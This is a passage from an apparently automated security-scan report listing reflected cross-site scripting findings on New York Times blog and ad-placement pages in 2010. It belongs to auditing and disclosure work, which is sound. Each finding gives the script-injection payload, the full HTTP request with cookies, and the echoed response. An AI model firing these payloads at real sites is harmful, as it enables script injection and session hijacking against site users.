X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:14:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/william-d-cohan/feed9efda\"><script>alert(1)</script>ebb295baa3a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.249. http://opinionator.blogs.nytimes.com/category/william-d-cohan/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/william-d-cohan/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53f76"><script>alert(1)</script>4e42a0845ae was submitted in the REST URL parameter 3. This input was echoed as 53f76\"><script>alert(1)</script>4e42a0845ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/william-d-cohan/page53f76"><script>alert(1)</script>4e42a0845ae/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/william-d-cohan/page53f76\"><script>alert(1)</script>4e42a0845ae/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.250. http://opinionator.blogs.nytimes.com/tag/alan-simpson/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/tag/alan-simpson/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c449"><script>alert(1)</script>aa03640b195 was submitted in the REST URL parameter 2. This input was echoed as 6c449\"><script>alert(1)</script>aa03640b195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/alan-simpson6c449"><script>alert(1)</script>aa03640b195/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:34:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:34:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/alan-simpson6c449\"><script>alert(1)</script>aa03640b195&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.251. http://opinionator.blogs.nytimes.com/tag/budget/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/tag/budget/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2cba"><script>alert(1)</script>07b5f6d156f was submitted in the REST URL parameter 2. This input was echoed as b2cba\"><script>alert(1)</script>07b5f6d156f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/budgetb2cba"><script>alert(1)</script>07b5f6d156f/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:34:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/budgetb2cba\"><script>alert(1)</script>07b5f6d156f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.252. http://opinionator.blogs.nytimes.com/tag/erskine-bowles/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/tag/erskine-bowles/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46da7"><script>alert(1)</script>1e63690772d was submitted in the REST URL parameter 2. This input was echoed as 46da7\"><script>alert(1)</script>1e63690772d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/erskine-bowles46da7"><script>alert(1)</script>1e63690772d/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:35:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:35:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/erskine-bowles46da7\"><script>alert(1)</script>1e63690772d&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.253. http://opinionator.blogs.nytimes.com/tag/federal-deficit/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/tag/federal-deficit/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e27d9"><script>alert(1)</script>9f7b01c18fc was submitted in the REST URL parameter 2. This input was echoed as e27d9\"><script>alert(1)</script>9f7b01c18fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/federal-deficite27d9"><script>alert(1)</script>9f7b01c18fc/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:35:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/federal-deficite27d9\"><script>alert(1)</script>9f7b01c18fc&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.254. http://opinionator.blogs.nytimes.com/tag/health-care-reform/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/tag/health-care-reform/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5372b"><script>alert(1)</script>38c18077a9b was submitted in the REST URL parameter 2. This input was echoed as 5372b\"><script>alert(1)</script>38c18077a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/health-care-reform5372b"><script>alert(1)</script>38c18077a9b/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:35:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:35:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/health-care-reform5372b\"><script>alert(1)</script>38c18077a9b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.255. http://opinionator.blogs.nytimes.com/tag/social-security/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/tag/social-security/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbbda"><script>alert(1)</script>3f6532f4d66 was submitted in the REST URL parameter 2. This input was echoed as bbbda\"><script>alert(1)</script>3f6532f4d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/social-securitybbbda"><script>alert(1)</script>3f6532f4d66/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:34:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:34:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/social-securitybbbda\"><script>alert(1)</script>3f6532f4d66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.256. http://opinionator.blogs.nytimes.com/tag/taxes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/tag/taxes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a055"><script>alert(1)</script>e55dc6ad2dd was submitted in the REST URL parameter 2. This input was echoed as 8a055\"><script>alert(1)</script>e55dc6ad2dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/taxes8a055"><script>alert(1)</script>e55dc6ad2dd/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:35:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:35:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/taxes8a055\"><script>alert(1)</script>e55dc6ad2dd&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.257. https://placead.nytimes.com/default.asp [CategoryID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://placead.nytimes.com
Path:	/default.asp

Issue detail

The value of the CategoryID request parameter is copied into a JavaScript rest-of-line comment. The payload eb5ca%0aalert(1)//b980444a65b was submitted in the CategoryID parameter. This input was echoed as eb5ca
alert(1)//b980444a65b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /default.asp?CategoryID=NYTCAReb5ca%0aalert(1)//b980444a65b HTTP/1.1
Host: placead.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Nov 2010 02:36:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24581
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBCSTDB=FAMDFFPCDIBJNBMJJBLKKHME; path=/
Cache-control: private

<script language="javascript">
alert("The information you have entered is not valid. Please try again.");
history.go(-1);
</script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
...[SNIP]...
<SCRIPT TYPE="text/javascript">
//-------------------------------------------------------------------------
function Check_Step1()
{
   var chk = "N"
   //if ('NYTCAReb5ca
alert(1)//b980444a65b' != 'BOSWTS')
   //{
       //document.ListingType.LTypeId.checked = true;
       //return true
   //}

   for (i = 0; i < document.ListingType.LTypeId.length; i ++) {
       if (document.ListingType.LTypeId[i].che
...[SNIP]...

3.258. http://prescriptions.blogs.nytimes.com/2010/11/12/group-says-camel-packs-lure-the-young/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://prescriptions.blogs.nytimes.com
Path:	/2010/11/12/group-says-camel-packs-lure-the-young/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b729"><script>alert(1)</script>c6039f40b13 was submitted in the src parameter. This input was echoed as 2b729\"><script>alert(1)</script>c6039f40b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/group-says-camel-packs-lure-the-young/?src=twr2b729"><script>alert(1)</script>c6039f40b13 HTTP/1.1
Host: prescriptions.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:36:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://prescriptions.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ring&keywords=health+care+reform,health+care+costs,insurance,prescription+drugs,hospitals,medicine,health+policy,The+New+York+Times;campaign-for-tobacco-free-kids;marketing;r-j-reynolds;tobacco&src=twr2b729\"><script>alert(1)</script>c6039f40b13">
...[SNIP]...

3.259. http://scientistatwork.blogs.nytimes.com/2010/11/12/drought-in-the-amazon-up-close-and-personal/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scientistatwork.blogs.nytimes.com
Path:	/2010/11/12/drought-in-the-amazon-up-close-and-personal/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc24e"><script>alert(1)</script>92f6252037 was submitted in the src parameter. This input was echoed as fc24e\"><script>alert(1)</script>92f6252037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/drought-in-the-amazon-up-close-and-personal/?src=twrfc24e"><script>alert(1)</script>92f6252037 HTTP/1.1
Host: scientistatwork.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:38:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
